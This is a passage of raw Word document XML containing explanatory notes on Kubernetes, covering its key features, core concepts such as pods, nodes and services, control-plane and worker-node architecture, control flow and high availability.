    <w:p w14:paraId="228B71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Key Features of Kubernetes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A8E597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Container Orchestration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="220A66B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containers (like Docker) at </w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>scale</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="041387C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andles scheduling, lifecycle, networking, and storage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C4D669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Self-Healing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="406676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starts failed containers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35CF2C8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places and reschedules containers when nodes die.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67EB1A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lls containers that don't respond to health checks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4156C9A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Load Balancing &amp; Service Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39828E5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container using a DNS name or IP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="609C744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s network traffic to maintain stability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D26AB1A"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4. Horizontal Scaling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F7EEB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utomatically scales containers up/down based on CPU or custom metrics.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="431691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5. Rolling Updates and Rollbacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E2D21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Updates applications with </w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>zero downtime</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA3681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olls back to previous versions if something goes wrong.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ADC439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6. Storage Orchestration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F19FBE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unts storage systems like AWS EBS, GCP Persistent Disk, NFS, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E0C2AD"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7. Configuration Management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13993BE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Uses ConfigMaps and Secrets to manage environment variables and credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="789B79E2"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C05F2">
          <v:rect id="_x0000_i3661" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F9FCE0E"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5182"/>
      </w:tblGrid>
      <w:tr w:rsidR="009D1D6F" w:rsidRPr="009D1D6F" w14:paraId="0A16A7B2" w14:textId="77777777" w:rsidTr="00BF7CA0">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="30B0F22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cept</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0F45F6B8"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Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009D1D6F" w:rsidRPr="009D1D6F" w14:paraId="14FE9A54" w14:textId="77777777" w:rsidTr="00BF7CA0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="222C09A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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0E7AB8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mallest unit in K8s. Can contain one or more containers.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009D1D6F" w:rsidRPr="009D1D6F" w14:paraId="66CB7B34" w14:textId="77777777" w:rsidTr="00BF7CA0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="06734F4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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="10B40FB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 machine (VM or physical) that runs pods.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009D1D6F" w:rsidRPr="009D1D6F" w14:paraId="6966321B" w14:textId="77777777" w:rsidTr="00BF7CA0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="27425BA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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="37C3B0E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Group of nodes managed by Kubernetes.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009D1D6F" w:rsidRPr="009D1D6F" w14:paraId="49B28135" w14:textId="77777777" w:rsidTr="00BF7CA0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="109D2BC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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="78A4147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replica sets and updates for pods.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009D1D6F" w:rsidRPr="009D1D6F" w14:paraId="6CE15B99" w14:textId="77777777" w:rsidTr="00BF7CA0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6013B5E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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6F355A9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set of pods as a network service.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009D1D6F" w:rsidRPr="009D1D6F" w14:paraId="0F1993C6" w14:textId="77777777" w:rsidTr="00BF7CA0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1C83E97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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0B9FDE2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external access to services (HTTP/HTTPS).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6346C91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BC06">
          <v:rect id="_x0000_i3662" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D9DD0C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Example Use Case</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A60009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You have a </w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>microservices app</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> with:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7003A2E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rontend (Angular)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="568E6A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ackend (Spring Boot)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A76BF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base (PostgreSQL)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E6CDD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afka</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E73471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helps you deploy, manage, scale, and monitor all of them efficiently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7879EA49" w14:textId="2D2F74D3"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663" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A18FB3E" w14:textId="6BD485A5"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05" w:name="_Toc197868119"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain Kubernetes Architecture?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="905"/>
    </w:p>
    <w:p w14:paraId="779372ED" w14:textId="3B33A009" w:rsidR="00BF7CA0" w:rsidRPr="009D1D6F" w:rsidRDefault="00BF7CA0"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Overview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EACEDB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ECFA0C">
          <v:rect id="_x0000_i3664" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="41CD112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Master Node (Control Plane)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7317D3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master node</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (or </w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>control plane</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>) is the heart of a Kubernetes cluster. It manages the cluster's state, makes decisions (e.g., scheduling), and monitors the cluster's health.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7412B59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lastRenderedPageBreak/>
        <w:t>Components of the Master Node:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CCC98A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 (kube-apiserver)</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="200906D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rves as the frontend for the Kubernetes control plane.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1557A36C"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REST APIs for interaction with the cluster.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E2526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ll interactions with Kubernetes, like creating resources (pods, services, etc.), go through the API server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="524C564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 (kube-controller-manager)</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="559713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nsures the desired state of the cluster is maintained.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FDD6F7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nitors the state of resources and makes adjustments (e.g., pod restarts, scaling).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D08E8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w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>replica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deployment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stateful set controllers</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29CBE43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 (kube-scheduler)</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DFF05E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ssigns workloads (pods) to nodes based on resource availability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B91FBF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hooses which node a pod should run on based on factors like resource requirements and constraints.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A7BB0B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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7636ED43"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d key-value store used for persistent storage of the cluster's state.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="343917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tores cluster configurations and metadata (e.g., pods, nodes, secrets, etc.).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D4971F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ighly available and consistent.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A4C56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419A5D">
          <v:rect id="_x0000_i3665" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D34CE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Worker Node</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DECF5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orker nodes are the machines (either virtual or physical) that run the containers. They host the pods, which are the smallest deployable units in Kubernetes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="668CF706"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mponents of a Worker Node:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48ED9B0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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E60A94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n agent running on each node, ensuring the containers inside the pods are running as expected.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D4A741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ommunicates with the master node to report the node's health and status.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C55514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201BFB58"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intains network rules that allow communication between pods, services, and external clients.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C861DD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Provides load balancing to distribute network traffic across available pods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70335D6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ainer Runtime</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D9411E9"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oftware responsible for running containers (e.g., Docker, containerd).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34800677"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ecutes containers inside the pods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E84CF9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s</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="381C64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mallest unit of execution in Kubernetes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3447F5B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xml:space="preserve"> can contain one or more containers (typically a single container, but multi-container pods are useful in some cases).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47A93874"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CBEA3A">
          <v:rect id="_x0000_i3666" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E799F9"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Kubernetes Objects</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D0ACB8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se are the resources Kubernetes uses to manage and control applications and workloads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="522E233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The smallest unit of deployment. A pod can hold one or more containers that share the same network namespace and storage volumes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F0947C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eplicaSet</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Ensures that a specified number of pod replicas are running at any given time. Used to scale pods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3214490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r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Manages a set of replica sets and provides declarative updates for pods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F419AC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Exposes a set of pods as a network service. Kubernetes services provide load balancing and stable network endpoints.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22DBC85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r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Manages external access to services, typically HTTP, and provides URL routing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64A0A736"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E5AA6E">
          <v:rect id="_x0000_i3667" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="023BB00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trol Flow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46DC446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r Interaction</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B39BB3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user interacts with the Kubernetes cluster via the </w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>kubectl</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> command-line tool or the Kubernetes API server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40CF8DD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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="758028D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API server processes requests and sends them to the appropriate components (such as the scheduler, controller manager, etc.).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50AAEC5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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4839766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cheduler determines which node should run the new pods based on resource availability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F7F70F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w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="371D3B4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roller manager ensures that the desired state of the cluster is achieved (e.g., ensuring the right number of replicas for a pod).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7778B9B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Kubelet</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D7952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kubelet on each worker node makes sure the correct pods are running on the node.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="626110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40D1C5A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 proxy handles networking and manages the load balancing of services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A998FA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 and Container</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00290C0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ainers in the pods run the application workloads as defined in the deployment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41BE5263"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8256F">
          <v:rect id="_x0000_i3668" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D6B79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luster Flow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F21346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The API server</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> receives requests from users (via kubectl or other tools).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E4853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xml:space="preserve"> communicates with </w:t>
      </w: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to store or retrieve configuration data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34D7B6D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xml:space="preserve"> decides on the placement of pods on nodes based on resource availability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="528D6B5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xml:space="preserve"> on worker nodes runs the actual containers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="165B7BF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xml:space="preserve"> ensures network communication between pods, services, and the outside world.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EAE7AC8"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10D9C">
          <v:rect id="_x0000_i3669" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A9274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High Availability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7254490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achieve high availability, Kubernetes is typically deployed with:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2682458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ultiple </w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>master nodes</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (control plane) for redundancy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EB2C1BB"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is replicated to ensure fault tolerance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ABF13C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s</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> spread across different zones or regions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F66820C"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3DDEE">
          <v:rect id="_x0000_i3670" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A97EE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Diagram</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A5DDA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ere is a simplified diagram of the Kubernetes architecture:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E77C8D9" w14:textId="4388E651"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hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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2"/>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5DF83">
          <v:rect id="_x0000_i3671" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D0FA41" w14:textId="77777777" w:rsidR="00767845" w:rsidRPr="009D1D6F" w:rsidRDefault="00767845" w:rsidP="009D1D6F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
